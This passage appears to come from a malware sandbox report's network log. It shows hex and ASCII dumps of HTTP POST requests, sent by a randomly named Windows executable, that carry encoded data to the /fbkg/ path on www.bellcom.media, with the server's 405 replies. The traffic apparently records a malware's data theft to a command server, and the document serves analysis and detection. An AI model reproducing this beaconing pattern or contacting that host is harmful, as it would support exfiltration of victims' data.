yFSn/SdbsBi1zbHiNNo9o2Pj397oDHjKvP64T/btOnrwNuxIT6T61Okao96aS23yPUHk5WOgYJkSwm115oxX9tOxcK5cSk8aapqqUGlEkubmBaPXiIlH5xDp11Ou8FjxlI0Emx+wzGCYcB+0SDY+vvERUgcknCOtzICWfM20JxcRmPzc3/frVSLJuB56m6w5gL9nqDtpHjIalW0IOS1bOfeKtHk1aEPANQ6v+17fxNqgsVDzrLkYEBD6ejpzopb2xZxydHNks/Gym+QODis503FBNigmGljzA+aLn0ZG0KbCCdvJ4nZ8z+hJyZmNJ/M/nHXgFx79X5HYcZM3UEbHv5EKzRRyq7jd86E1X7s0uWB3dxWH9ey0gYoNZFK+o7yXJgE54KhyBJc0kjaF8MUB0WumpiMImYBaDwoClBjgrwb2+fCdj2NY1Fd5SkqNUWARyzwPTJ4LZiOfIfeovn1zJYRcn4SlJ9jwsRsb1zcFpsVhvfu0F/WIc2XtqU5BJ0IO8zSyADTY7bFSik/daOr7KKgV4pQBKxqwq01dczXTN2OfiWdC2gfraQPimWSVWlYcPgeKlmWB8l9M8sBjQa5wZZvJIYJ2IKfhdxzqvR1Kq6Os7rbDfV6wYQRWk3RCynXYstv0iBd9DEt9GeCGAhxwZ+Ny9
                                                                                                                                                                                                Nov 17, 2023 19:26:27.334551096 CET319OUTData Raw: 6b 38 6b 6b 4c 52 31 45 65 75 65 70 47 5a 77 6b 4c 62 7a 63 4f 54 78 61 2b 4e 35 75 34 57 61 59 50 31 43 69 6a 68 51 72 6d 68 42 66 73 44 48 44 31 68 30 62 65 76 57 68 6a 72 64 48 5a 47 46 6e 67 4c 72 2b 7a 69 2b 6e 58 72 68 6d 63 30 70 52 6f 53
                                                                                                                                                                                                Data Ascii: k8kkLR1EeuepGZwkLbzcOTxa+N5u4WaYP1CijhQrmhBfsDHD1h0bevWhjrdHZGFngLr+zi+nXrhmc0pRoS6HfswVIoQvioBgNTtIQPZntGN8HBguku10I6RZTWFdqZqZ2EPNDdOvKYh4qQH8NMn+VQG0QNfy34YxsuPeZly3oCGogWllAu96eAraOq9tZUE+ZhTcuPy4mmRQHCV69JmeqbkaVPK7s9J/rQrCOYmTssi44wcarCS
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335561037 CET322OUTData Raw: 79 61 43 34 6f 6f 76 37 71 46 4b 49 78 4c 38 75 43 33 32 54 73 73 48 78 4f 47 43 74 46 6d 6d 4a 67 44 71 78 74 65 48 6b 4f 38 76 48 39 2b 41 2f 77 4e 4e 45 65 6d 7a 79 54 52 64 5a 52 41 33 34 74 7a 43 42 51 38 50 2b 61 38 58 4c 4c 79 67 39 68 4b
                                                                                                                                                                                                Data Ascii: yaC4oov7qFKIxL8uC32TssHxOGCtFmmJgDqxteHkO8vH9+A/wNNEemzyTRdZRA34tzCBQ8P+a8XLLyg9hKU+y3vvce9G2O4d6paPnh7cPCudQNBd7o56zGqxWkOsQJCHbnO4yFNKMjpHGwCfhoJTW+hfL5mpeJCLcOL5B0wW22NS8A48SFG+/NlyhyO+vKv0GVoeR43Els191yb0PLE+yFkOKr3kUGs6NG2nXmkJ1j4CrAI7tOy
                                                                                                                                                                                                Nov 17, 2023 19:26:27.335896015 CET324OUTData Raw: 54 78 77 36 59 59 68 2b 6e 77 6f 6b 59 33 45 58 4c 4f 6e 4d 6e 4c 55 32 51 68 65 36 4a 48 61 45 63 39 56 2b 62 42 35 56 70 76 70 48 2f 36 76 57 45 54 4c 75 4c 78 6a 34 57 56 32 68 52 39 77 65 7a 41 35 35 38 31 54 56 4a 63 6d 66 64 49 54 69 56 41
                                                                                                                                                                                                Data Ascii: Txw6YYh+nwokY3EXLOnMnLU2Qhe6JHaEc9V+bB5VpvpH/6vWETLuLxj4WV2hR9wezA5581TVJcmfdITiVAxAzbL7F43NpiFG3clN7c1NgKV5l27bVIqjO8eja++FRhJrEQMflZZFynGPikbj3+9f7LE3SfsfvYlDcFC6hOYn+P+YUOp4tZ6YgW3cWh8sUI71Z0usW92hr//faiaQevtA7a7vKU7DKfbJZsqc5ZNnXzd2I+tvR9Z
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336538076 CET325INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:27 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:26:27.336848021 CET328OUTData Raw: 55 70 72 69 49 75 39 6f 78 77 36 2b 6f 4e 63 4c 4d 78 37 31 6f 70 52 30 6e 57 2b 63 63 4a 65 56 57 54 49 37 30 4d 46 77 52 53 41 44 71 4d 4f 30 55 35 45 39 73 33 78 6b 6e 6f 6c 32 44 6b 41 4d 34 6f 6a 38 41 38 36 46 43 67 44 52 31 62 41 4b 2b 77
                                                                                                                                                                                                Data Ascii: UpriIu9oxw6+oNcLMx71opR0nW+ccJeVWTI70MFwRSADqMO0U5E9s3xknol2DkAM4oj8A86FCgDR1bAK+wMvyrA1+9ulppc1b0AbIA7XJJMVlnEy6VykAa6pOytndMuokMV2JK/CAvbFLyDvpcCSgZhh2BW+b6i8nFF0Yv2XKPs4TA7NMm0TPXy6tnchmjMGgCbMXpuYWQLxUN66/VnTCxlrNgKwT3rIVbPASXowku5QVbKCzbj
                                                                                                                                                                                                Nov 17, 2023 19:26:27.337019920 CET337OUTData Raw: 2b 49 76 63 39 6d 6f 30 39 61 30 6c 67 55 57 48 37 74 46 46 66 4b 2f 2b 48 34 57 54 33 33 64 4f 4b 59 2f 74 4b 6d 78 32 63 52 2f 64 4a 4b 49 6a 56 41 49 6a 76 72 41 32 2b 6d 67 77 2f 76 47 48 45 73 38 6a 33 34 50 37 66 2f 56 38 69 4f 37 2b 50 4c
                                                                                                                                                                                                Data Ascii: +Ivc9mo09a0lgUWH7tFFfK/+H4WT33dOKY/tKmx2cR/dJKIjVAIjvrA2+mgw/vGHEs8j34P7f/V8iO7+PLWUZmBzGr6IeAPGGIb9m6hYqqF7+ZnlQN/UqmpS/Pg95PjHLMQWVkFFcHgOT7Urla0pA3OvgR3Ze9an60K0hR51WT8DSlpaANy3KHeEZUpF5uBqXUfLGxgjaL+ZkQwONAVETEvHmaHyYXAMsOMb21YeXf7BXxPyLed
                                                                                                                                                                                                Nov 17, 2023 19:26:27.337151051 CET341OUTData Raw: 5a 6c 34 6b 2b 4a 38 67 46 48 33 79 76 70 53 31 58 5a 57 37 75 45 66 43 76 59 57 36 66 57 65 63 52 37 71 54 56 67 63 76 2b 45 47 6e 58 52 50 6f 59 54 4e 6b 53 51 39 31 52 68 37 62 4e 43 73 30 67 51 31 6b 58 4c 35 76 33 62 2b 77 2f 37 64 66 36 7a
                                                                                                                                                                                                Data Ascii: Zl4k+J8gFH3yvpS1XZW7uEfCvYW6fWecR7qTVgcv+EGnXRPoYTNkSQ91Rh7bNCs0gQ1kXL5v3b+w/7df6zkbTT9rEVwkPI61CuMLs4UlitDh0GnatqwkB9nxeKwQopwFr5XeY50hWDkzz+ET5mz2nQSP2Vvuk2WGAP+n6uB0BBdZ8psohoOB9nU87rD0Co6pTqMCAPqkpS6f6LnugCLWfIR+0aQ260OmXThn+6brgS+CfW+BTUJ
                                                                                                                                                                                                Nov 17, 2023 19:26:27.376364946 CET343OUTData Raw: 57 59 74 6a 30 58 71 50 34 35 64 71 35 49 5a 34 75 42 61 47 38 59 61 68 79 39 37 65 70 6f 54 45 4a 53 62 31 55 36 59 79 55 2f 6b 54 6a 59 73 35 4c 62 74 50 6e 61 48 5a 57 57 47 65 6f 48 6c 5a 4f 44 45 71 7a 49 36 66 6d 50 64 43 35 53 6b 49 67 4f
                                                                                                                                                                                                Data Ascii: WYtj0XqP45dq5IZ4uBaG8Yahy97epoTEJSb1U6YyU/kTjYs5LbtPnaHZWWGeoHlZODEqzI6fmPdC5SkIgORwkT7mfhvhKSijACGB8ccIQZBmofWIvpEy4bRrRvVhBmV8Q045T8XfjQXbSWXp0GYJsdCH5B5x+iWGjp2rSRqiHgn9UEkqve0hFP0MwOV4ntu1tkD4TwFTGKoRHH0jmstHAN/OdEqhV48imxFr1AabL3UiqbgLe3z
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529438019 CET346OUTData Raw: 4e 38 57 66 6e 39 4d 48 62 35 70 75 63 49 53 62 71 65 79 6d 36 4b 54 72 6b 6a 32 77 75 76 54 48 45 58 34 2f 54 51 51 61 52 58 6f 6e 73 51 37 7a 59 64 66 47 64 6c 56 58 69 41 79 46 4c 31 57 33 43 71 6f 57 30 51 71 32 63 44 2b 66 6e 4c 77 34 6a 2b
                                                                                                                                                                                                Data Ascii: N8Wfn9MHb5pucISbqeym6KTrkj2wuvTHEX4/TQQaRXonsQ7zYdfGdlVXiAyFL1W3CqoW0Qq2cD+fnLw4j+5g+c9khP4QaDNZYUZxL+g9TS4vSlxR2nXjxxLkRUjMWIjz9Lr39LFJjy3t/Nsnl2H7NPQwObFzyP60aoIk4mKy5gXDLLTAfoJLBkAJ9FTv6PPzlNcQOolGa7ou3ZfmQLRPdgH1GK/vuxAtpIkD9y+j85gfW3ZyUii
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529602051 CET347OUTData Raw: 42 51 51 36 78 6f 2b 51 52 4b 6c 6a 66 72 38 75 74 79 37 49 58 78 50 38 43 2f 46 44 77 6e 47 34 41 53 6d 49 52 47 49 7a 30 4f 4f 39 44 52 7a 69 4a 30 57 36 77 65 56 44 51 46 31 6a 37 6e 46 37 49 6d 76 35 78 72 50 54 34 57 70 76 42 79 54 64 6f 55
                                                                                                                                                                                                Data Ascii: BQQ6xo+QRKljfr8uty7IXxP8C/FDwnG4ASmIRGIz0OO9DRziJ0W6weVDQF1j7nF7Imv5xrPT4WpvByTdoUpnnjP/odTcOEpJz3aWAz+iecuck5A9mvS7eRrw4ApSj/UzzoEETCxG7EQUamo3mEFmQUas3NSOWu5yIv5NKInY87jCyYc1AiN3oT0QGVYJwiEBt39DxXjXK3oL7tBTFfkvqfRo9e2A5V6Nei7N5urxPT627BRD65k
                                                                                                                                                                                                Nov 17, 2023 19:26:27.529773951 CET351OUTData Raw: 2f 31 54 48 30 4f 6d 59 2b 44 51 77 6f 74 53 67 64 47 71 75 76 4b 6a 75 44 59 37 49 4e 6a 6f 4d 2f 68 4a 47 74 77 51 47 45 41 73 57 43 2b 5a 4d 4d 75 6c 63 55 65 6c 6a 5a 6d 63 4e 50 6c 6f 46 36 52 52 35 34 5a 65 6b 69 54 71 6f 35 38 38 4b 39 4d
                                                                                                                                                                                                Data Ascii: /1TH0OmY+DQwotSgdGquvKjuDY7INjoM/hJGtwQGEAsWC+ZMMulcUeljZmcNPloF6RR54ZekiTqo588K9MEawbVUKCgH6iUIfWMZaZlwvK4meLJ5RogljEEAU022KRGMbHyn3IY8GU+C+Md47cHuCkB5O24dozyRTMwFtZXy/XB292D/Dln1EdcjjynSRlHVt+6X/UsV6x69tbnfmMk7WZk0l9zVfSXtKw22kPU7+T6vdUMtZ6o


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                591.195.240.12380192.168.11.2050132C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:27.139713049 CET317OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 67 5a 35 4d 64 71 59 57 34 42 6f 35 53 38 57 4b 59 37 42 4e 43 78 6f 71 32 78 45 47 37 41 6f 76 55 65 46 53 32 79 35 37 4a 36 38 6d 4e 4b 4d 64 72 73 74 6a 78 42 48 75 53 77 31 32 6d 73 79 46 4e 4c 72 32 69 70 30 41 45 61 75 32 57 32 54 5a 69 59 6c 73 6c 62 67 49 79 39 66 73 30 42 66 6f 4d 48 49 70 6a 56 38 53 76 78 46 67 35 4b 4d 6a 37 6e 38 63 36 34 52 4d 33 65 4b 64 4a 62 31 73 6b 62 4e 6e 7a 35 39 6c 58 54 46 46 34 7a 52 48 38 63 6b 39 73 57 38 4d 54 55 37 4b 68 5a 56 57 30 76 32 4e 68 44 65 4c 68 6b 53 58 70 43 56 4d 6a 4d 64 7a 49 66 73 4b 57 7a 34 6c 31 44 4e 4a 44 34 35 58 31 34 64 6a 77 64 42 65 44 61 65 37 78 37 63 62 4a 30 35 4b 34 75 4a 5a 4b 41 4f 38 50 76 42 36 76 39 47 67 48 6a 55 79 6a 77 30 37 57 32 6d 6e 41 62 4e 30 35 4a 6f 4c 6b 64 64 64 6d 6a 4d 79 55 5a 57 62 56 38 68 43 35 59 46 63 4e 4d 46 6f 57 7a 6f 79 6b 73 2b 2b 76 77 59 78 56 51 77 4f 46 79 59 4d 50 6c 63 70 65 56 48 38 45 2f 50 68 79 5a 33 6d 69 65 56 39 39 74 32 63 37 71 46 77 37 71 4b 45 43 41 44 69 4b 36 63 4b 4d 41 34 75 53 61 57 74 45 62 48 73 48 30 4a 51 4d 4a 76 31 6d 36 72 79 6e 73 6a 35 57 45 38 42 4e 4e 47 32 35 74 76 6f 47 6a 49 4e 67 65 50 33 31 57 45 32 34 2b 67 37 6e 43 64 62 50 31 2f 52 78 66 55 6d 6d 4d 32 49 46 42 31 58 4a 64 4e 67 49 32 34 53 45 45 74 35 4f 57 45 4c 61 57 35 44 6f 4c 70 73 31 4d 6d 58 68 71 54 55 76 78 66 52 4f 59 70 54 6f 2f 70 54 32 30 47 47 6e 77 39 55 69 72 45 33 48 52 6a 69 64 43 57 36 49 4f 66 68 35 47 34 30 69 74 75 42 38 2f 35 41 47 38 52 39 6e 43 4e 41 55 73 4d 4e 75 42 49 6c 73 76 55 30 58 61 6d 41 54 68 31 38 43 77 64 59 63 71 30 52 71 6a 6b 45 30 62 5a 65 4a 61 6a 49 74 50 47 58 4b 56 6e 58 39 69 52 45 70 64 36 2f 38 54 61 34 69 4e 67 37 67 74 6c 4d 6a 52 64 66 44 4f 4d 46 78 44 35 39 44 33 53 56 51 53 6a 70 34 53 7a 74 49 6c 39 54 68 33 79 52 58 76 62 79 55 42 2b 6c 73 56 69 42 71 4f 62 73 61 4f 67 31 55 34 53 47 48 39 39 46 79 49 41 33 44 2f 4a 66 41 37 39 57 74 49 6f 6c 35 41 54 36 38 66 69 2f 77 72 50 4c 76 74 75 53 79 47 73 75 78 50 61 68 50 6c 6c 4c 31 38 68 36 7a 6d 79 61 34 74 58 71 61 7a 49 6f 76 66 4f 38 6b 65 59 41 63 6c 77 46 5a 62 4f 36 56 57 50 54 36 6e 50 49 4b 53 50 57 6b 6e 74 6f 71 44 71 65 49 54 49 6b 63 6b 4a 73 2b 55 5a 6c 30 70 57 34 76 51 68 66 6a 36 54 46 6d 6a 79 31 30 4f 38 45 72 59 6a 7a 76 73 4b 44 36 31 5a 4d 57 54 2b 71 32 34 49 71 4f 58 4c 57 6f 4f 37 4c 4c 38 52 52 75 75 30 65 38 4e 38 49 51 51 48 51 7a 67 39 4d 57 65 79 75 2f 53 50 39 31 7a 42 48 52 72 45 74 54 38 77 52 55 74 78 34 37 6d 43 67 4f 64 6e 56 6c 57 39 77 62 70 6d 77 4d 65 5a 61 63 4e 49 41 51 70 48 6d 68 4d 51 4c 48 57 5a 66 42 55 52 37 39 69 38 61 31 76 4c 5a 66 67 49 35 4b 4b 51 61 42 32 44 72 52 6a 70 54 6a 6a 72 36 68 66 67 6e 61 2f 31 79 75 5a 61 32 6b 6b 71 74 6e 6c 52 70 39 49 39 2f 77 39 46 77 44 52 39 59 76 68 34 54 33 63 7a 6a 36 69 48 6c 39 64 63 43 31 37 6e 34 5a 43 6a 6e 62 6d 79 4d 65 2f 56 51 44 56 74 43 41 5a 6e 2b 6d 43 41 6f 2b 7a 66 2f 72 56 6b 30 5a 78 51 4b 57 41 46 4f 37 33 6f 48 59 46 35 6e 39 35 58 66 6b 2f 72 50 64 2f 52 39 42 44 36 38 6a 37 79 4b 66 76 4d 75 32 74 4f 6c 6a 4e 6e 45 78 4d 2f 42 32 6d 6e 70 30 34 45 4d 4e 61 37 54 70 2b 46 37 42 72 72 32 4d 2b 53 31 73 77 56 64 66 31 4f 42 51 59 65 35 71 4d 42 34 57 72 62 2f 46 72 56 46 38 5a 42 35 78 2b 4c 50 57 70 41 54 45 38 32 33 50 68 41 67 47 50 31 41 59 56 63 51 35 4a 34 33 47 72 41 4f 38 37 47 58 35 55 52 78 65 7a 38 51 48 37 4a 35 70 65 48 54 4c 4a 32 64 59 53 6c 6e 31 78 71 49 45 6d 6e 51 73 2f 76 62 31 79 49 79 33 49 38 58 6b 32 71 49 54 69 4d 32 78 43 63 38 50 65 69 32 53 49 7a 6f 47 59 54 59 55 5a 47 33 43 78 36 62 4c 7a 45 69 49 4f 2b 78 61 56 6d 6d 6a 35 64 37 4a 6d 69 4e 41 54 55 71 42 72 54 77 30 43 53 34 57 6a 54 6a 59 32 4b 6e 43 52 2f 59 50 32 6f 4b 49 56 6e 6b 46 5a 4d 78 6f 7a 59 75 55 63 56 47 41 67 57 48 62 4c 37 74 78 43 4b 4a 55 57 46 45 66 35 42 43 46 43 69 4d 69 35 42 73 72 71 4b 53 4e 78 6d 32 73 48 54 42 39 41 37 74 79 6b 2b 62 6c 48 65 2b 4c 68 79 74 6f
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:26:27.334551096 CET319OUTData Raw: 6b 38 6b 6b 4c 52 31 45 65 75 65 70 47 5a 77 6b 4c 62 7a 63 4f 54 78 61 2b 4e 35 75 34 57 61 59 50 31 43 69 6a 68 51 72 6d 68 42 66 73 44 48 44 31 68 30 62 65 76 57 68 6a 72 64 48 5a 47 46 6e 67 4c 72 2b 7a 69 2b 6e 58 72 68 6d 63 30 70 52 6f 53
